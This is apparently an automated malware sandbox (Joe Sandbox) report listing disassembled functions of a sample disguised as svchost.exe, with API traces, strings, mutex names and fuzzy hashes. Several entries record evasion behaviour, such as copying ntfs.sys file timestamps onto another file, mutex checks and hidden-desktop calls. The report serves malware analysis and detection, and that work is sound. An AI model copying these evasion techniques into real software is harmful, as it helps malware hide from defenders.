OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D1F9BC
ReleaseMutex.KERNEL32(00000000), ref: 02D1F9C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1F9D9
CloseHandle.KERNEL32(00000000), ref: 02D1F9EB
PathAddBackslashA.SHLWAPI(5c5904bc), ref: 02D1F9F6
Sleep.KERNEL32(00009C40,5c5904bc,HANDY), ref: 02D1FA10
Sleep.KERNEL32(00000064), ref: 02D1FA16

Strings

HANDY, xrefs: 02D1F9FC
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D1F9B0
\t, xrefs: 02D1F9F6
5c5904bc, xrefs: 02D1F9F1, 02D1FA01

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5c5904bc$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\t
API String ID: 4280258085-2230293276
Opcode ID: d3e911b9c73f59f3fbbc687b181cd2d41bbe410eaaa4fddcc76abe4c793fc5f6
Instruction ID: eea1ba209727663f69a1a99cf2358ae7321339a6f58e9f4ed7b021cfe51bce7e
Opcode Fuzzy Hash: d3e911b9c73f59f3fbbc687b181cd2d41bbe410eaaa4fddcc76abe4c793fc5f6
Instruction Fuzzy Hash: 30F0A431AC87157FE6016BA0BC0DF5E77D8AF06B58F504504B986A1B80DBF0AD148BB6

Function 02D22ED0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D22EFC
ReleaseMutex.KERNEL32(00000000), ref: 02D22F05
GetHandleInformation.KERNEL32(00000000,?), ref: 02D22F19
CloseHandle.KERNEL32(00000000), ref: 02D22F2B
PathAddBackslashA.SHLWAPI(5C5901AC), ref: 02D22F36
Sleep.KERNEL32(00009C40,5C5901AC,RFK), ref: 02D22F50
Sleep.KERNEL32(00000064), ref: 02D22F56

Strings

5C5901AC, xrefs: 02D22F31, 02D22F41
\t, xrefs: 02D22F36
RFK, xrefs: 02D22F3C
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D22EF0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5C5901AC$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK$\t
API String ID: 4280258085-2247665511
Opcode ID: 86e273ef1b1b95143ba71e2cc5b603d508bf1b18622ba07ce4a4ee26ec927cbd
Instruction ID: a3e16c1ed4854f287e7d87ca0a108eb4537d4f9b1b36731d7e2e26307e5dad4c
Opcode Fuzzy Hash: 86e273ef1b1b95143ba71e2cc5b603d508bf1b18622ba07ce4a4ee26ec927cbd
Instruction Fuzzy Hash: 83F0D1349C83616BF311AAA1AC4DF1B37D8AF34B08F504414FD46A13809BE0AD18C6A6

Function 02D1C688 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 34sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D1C69C
ReleaseMutex.KERNEL32(00000000), ref: 02D1C6A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1C6BD
CloseHandle.KERNEL32(00000000), ref: 02D1C6CF
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D1C6DE
PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C6E5
Sleep.KERNEL32(00009C40,5C590552,BSS), ref: 02D1C6FF
Sleep.KERNEL32(00000064), ref: 02D1C705

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D1C690
5C590552, xrefs: 02D1C6E0, 02D1C6F0
BSS, xrefs: 02D1C6EB
\t, xrefs: 02D1C6E5

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
String ID: 5C590552$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$\t
API String ID: 3206501308-3656192160
Opcode ID: 3802564fa270dc2ceb0c83e16729c46bb468bb855bd8487cbd2ef6e09f8861bc
Instruction ID: 8efeb58514e88622c06023195797ff8f0d259a8c41b5c8134bc3e62815db73a3
Opcode Fuzzy Hash: 3802564fa270dc2ceb0c83e16729c46bb468bb855bd8487cbd2ef6e09f8861bc
Instruction Fuzzy Hash: 83F090349D8355BBE6216F60BC0DF1A37D4AF0AB59F108905F956917809BF09C18CB67

Function 02D11930 Relevance: 17.9, APIs: 14, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7900cbe535a1e89898712b57f2c590c0cca9b27d16e20da0c064af4ca919282
Instruction ID: 1510d8aa1653bfba41860462f3ef9b6747818b7f8307e344ba3059c0446821a8
Opcode Fuzzy Hash: a7900cbe535a1e89898712b57f2c590c0cca9b27d16e20da0c064af4ca919282
Instruction Fuzzy Hash: EDC12735A04616AFCB15CF68E8A4BAFBBB2FF46344B144244EE599B744D730EE05CB90

Function 02D07A00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 136registrymemoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D07A0A
memset.MSVCRT ref: 02D07A41
memset.MSVCRT ref: 02D07A59
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7591F380), ref: 02D07A7B
RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7591F380), ref: 02D07AA1
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7591F380), ref: 02D07B2D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7591F380), ref: 02D07B34
memset.MSVCRT ref: 02D07B43
RegCloseKey.ADVAPI32(?,?,?,?,?,7591F380), ref: 02D07B73

Strings

software\microsoft, xrefs: 02D07A6B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AdminAllocCloseOpenProcessQueryUserValue
String ID: software\microsoft
API String ID: 4189572443-3673152959
Opcode ID: e30e238e5711422aed36e11cdcc65371d2a4e89e14a1db5726547b6ff44f40ea
Instruction ID: 16ff7c2a9ed13be6827fae8ebf40404abe90b70dda2b5213ff62883f291830c2
Opcode Fuzzy Hash: e30e238e5711422aed36e11cdcc65371d2a4e89e14a1db5726547b6ff44f40ea
Instruction Fuzzy Hash: 5F41F771A00149ABEB10DA649CC8FEAB7A9EB59304F5045A8E545DB390E770AE84CBA0

Function 02D113B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D113E3
memset.MSVCRT ref: 02D113FB
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7591F550,75921620), ref: 02D1141C
RegQueryValueExA.ADVAPI32(80000002,A3B7FB56a,00000000,00000001,?,00000104,?,?,?,?,7591F550,75921620), ref: 02D11443
GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7591F550,75921620), ref: 02D114CD
HeapAlloc.KERNEL32(00000000,?,?,?,?,7591F550,75921620), ref: 02D114D4
memset.MSVCRT ref: 02D114E3
RegCloseKey.ADVAPI32(80000002,?,?,?,?,7591F550,75921620), ref: 02D11513

Strings

A3B7FB56a, xrefs: 02D1143D
software\microsoft, xrefs: 02D11410

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValue
String ID: A3B7FB56a$software\microsoft
API String ID: 4158279268-1283225869
Opcode ID: f41ee266a6adea7b7143354d6622901a789f02c1ee8188e3431c8745751ee899
Instruction ID: 8168a1cea35113cc5c0533ec0dbac14f21b1c35d49678bcfab753ffc72a3ab6d
Opcode Fuzzy Hash: f41ee266a6adea7b7143354d6622901a789f02c1ee8188e3431c8745751ee899
Instruction Fuzzy Hash: E241277594015D7BEB10DBB4AC89BEA77B9EF59304F4005A8E649D3240E770DE88CBA0

Function 004019B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93processstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004019C8
memset.MSVCRT ref: 004019EE
lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,755CDB30,00000000,00000000), ref: 00401A06
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,755CDB30,00000000,00000000), ref: 00401A29
GetHandleInformation.KERNEL32(?,?+@,?,?,?,755CDB30,00000000,00000000), ref: 00401A4A
CloseHandle.KERNEL32(?,?,?,?,755CDB30,00000000,00000000), ref: 00401A57
GetHandleInformation.KERNEL32(?,?+@,?,?,?,755CDB30,00000000,00000000), ref: 00401A6E
CloseHandle.KERNEL32(?,?,?,?,755CDB30,00000000,00000000), ref: 00401A7B

Strings

?+@, xrefs: 004019F3, 00401A69, 00401A45, 004019FE, 00401A48, 00401A6C
D, xrefs: 00401A22

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: ?+@$D
API String ID: 2248944234-1654856090
Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4

Function 00401EA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 76filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
SetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F

Strings

*@, xrefs: 00401ED2, 00401F2B, 00401ED5, 00401F2E
\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401EC0

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
API String ID: 1046229350-2079472752
Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8

Function 02D24FD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02D07220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a3b7fb16a,76EDC3F0,?,?,02D122F0,00000000,00000001), ref: 02D07246
Part of subcall function 02D07220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07264
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D0728D
Part of subcall function 02D07220: RtlAllocateHeap.NTDLL(00000000,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07294
Part of subcall function 02D07220: memset.MSVCRT ref: 02D072A7
Part of subcall function 02D07220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D072D3
Part of subcall function 02D07220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D072E3
Part of subcall function 02D07220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D072F2
Part of subcall function 02D07220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D07305
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07314
Part of subcall function 02D07220: HeapValidate.KERNEL32(00000000), ref: 02D0731B

RtlImageNtHeader.NTDLL(00000000), ref: 02D24FFE
GetTickCount.KERNEL32 ref: 02D25012
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D151DB,C:\Windows\apppatch\svchost.exe), ref: 02D25023
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D25033
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D151DB,C:\Windows\apppatch\svchost.exe), ref: 02D25070
HeapValidate.KERNEL32(00000000,?,?,02D151DB,C:\Windows\apppatch\svchost.exe), ref: 02D25073
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D151DB,C:\Windows\apppatch\svchost.exe), ref: 02D25080
HeapFree.KERNEL32(00000000,?,?,02D151DB,C:\Windows\apppatch\svchost.exe), ref: 02D25083

Strings

ntdll.dll, xrefs: 02D2501E
RtlUniform, xrefs: 02D2502D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 1866686876-3277137149
Opcode ID: b86e1148e39782615642c5996b2eafbcc9c4ea70330c306fd1ea7d8161689fb8
Instruction ID: 64e5fce4cdbbaf1d5ef29f28f95b38682f20eb7489d09b9c3e39f8df329f24f4
Opcode Fuzzy Hash: b86e1148e39782615642c5996b2eafbcc9c4ea70330c306fd1ea7d8161689fb8
Instruction Fuzzy Hash: 04118E39A802107BE7249FB6BC88F9BBBA9EF55714F944914B909D6380DB34DD14CAE0

Function 00401DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004013C0: CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004013E7
Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401403
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401423
Part of subcall function 004013C0: HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 0040142A
Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
Part of subcall function 004013C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
Part of subcall function 004013C0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4

RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
GetTickCount.KERNEL32 ref: 00401E23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
HeapValidate.KERNEL32(00000000), ref: 00401E81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
HeapFree.KERNEL32(00000000), ref: 00401E91

Strings

ntdll.dll, xrefs: 00401E2F
RtlUniform, xrefs: 00401E3E

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 1392322707-3277137149
Opcode ID: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
Opcode Fuzzy Hash: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8

Function 02D21360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(?), ref: 02D21370
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D2137F
GetLastError.KERNEL32 ref: 02D21385
IsUserAnAdmin.SHELL32 ref: 02D21389
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D2139A
SetLastError.KERNEL32(00000000), ref: 02D213A1
_snprintf.MSVCRT ref: 02D213CF
Sleep.KERNEL32(00000FA0,?), ref: 02D213E5

Strings

\t, xrefs: 02D21370
%s\%02d.bmp, xrefs: 02D213BE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSleepSystemUser_snprintf
String ID: %s\%02d.bmp$\t
API String ID: 2890719241-422280511
Opcode ID: 59c122780d147fdb7777bd37140e39e92443f6e8ded7c160caaf8c1be161f347
Instruction ID: ab44fadf101bd7af4f1546e6e6c2360f754558e7cecd46d15ba3b9c60d487773
Opcode Fuzzy Hash: 59c122780d147fdb7777bd37140e39e92443f6e8ded7c160caaf8c1be161f347
Instruction Fuzzy Hash: A001B9BAD402245BC720DFB4AD88EDA77A8EF68704F844595EA8997240DA70DD58CBB0

Function 00402E40 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402E47
GetProcessHeap.KERNEL32(00000000,?,.5@,7529E610,00402E2E), ref: 00402E5F
HeapValidate.KERNEL32(00000000), ref: 00402E62
GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
HeapFree.KERNEL32(00000000), ref: 00402E72
GetProcessHeap.KERNEL32(00000000,.5@,.5@,7529E610,00402E2E), ref: 00402E7B
HeapValidate.KERNEL32(00000000), ref: 00402E7E
GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
HeapFree.KERNEL32(00000000), ref: 00402E8E

Strings

.5@, xrefs: 00402E54, 00402E78, 00402E88

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID: .5@
API String ID: 2629017576-427766238
Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8

Function 02D1F9A8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D1F9BC
ReleaseMutex.KERNEL32(00000000), ref: 02D1F9C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1F9D9
CloseHandle.KERNEL32(00000000), ref: 02D1F9EB
PathAddBackslashA.SHLWAPI(5c5904bc), ref: 02D1F9F6
Sleep.KERNEL32(00009C40,5c5904bc,HANDY), ref: 02D1FA10
Sleep.KERNEL32(00000064), ref: 02D1FA16

Strings

HANDY, xrefs: 02D1F9FC
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D1F9B0
\t, xrefs: 02D1F9F6
5c5904bc, xrefs: 02D1F9F1, 02D1FA01

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5c5904bc$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\t
API String ID: 4280258085-2230293276
Opcode ID: af9924cbe0f79e88b1c4ab0e5dfa5cf51c8179d7703b16c560d7e1a5a2e18330
Instruction ID: 681ed1a00b5c5d3d04920fb0322b5980ede5b3d8eff766582ffc96bccaa7dac2
Opcode Fuzzy Hash: af9924cbe0f79e88b1c4ab0e5dfa5cf51c8179d7703b16c560d7e1a5a2e18330
Instruction Fuzzy Hash: CEF08231AC83557FF6216B60BC0DB5E77D4AF06B49F104504F986A1B80DBF49C148BA2

Function 02D22EE8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D22EFC
ReleaseMutex.KERNEL32(00000000), ref: 02D22F05
GetHandleInformation.KERNEL32(00000000,?), ref: 02D22F19
CloseHandle.KERNEL32(00000000), ref: 02D22F2B
PathAddBackslashA.SHLWAPI(5C5901AC), ref: 02D22F36
Sleep.KERNEL32(00009C40,5C5901AC,RFK), ref: 02D22F50
Sleep.KERNEL32(00000064), ref: 02D22F56

Strings

5C5901AC, xrefs: 02D22F31, 02D22F41
\t, xrefs: 02D22F36
RFK, xrefs: 02D22F3C
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D22EF0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5C5901AC$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK$\t
API String ID: 4280258085-2247665511
Opcode ID: e273c92e77141af589b989f7063349853343be2a43a4dae67968af274c780e20
Instruction ID: a0ee122a3bd1aa16e1d2c4a461977ecee28ba1f493c7a14b0c94d8dfcea65f9e
Opcode Fuzzy Hash: e273c92e77141af589b989f7063349853343be2a43a4dae67968af274c780e20
Instruction Fuzzy Hash: 54F082349893A16BF721AF61BC0DB1E37D4AF25B09F504414FD4691380CBB09D1DCBA2

Function 02D08EC0 Relevance: 16.6, APIs: 11, Instructions: 120filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,75923050,759230D0,75923080), ref: 02D08F00
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D08F14
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D08F1F
UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02D08F47
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D08F64
CloseHandle.KERNEL32(00000000), ref: 02D08F75
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D4F54C), ref: 02D08F95
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D08FAC
HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D08FEC
ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D09034
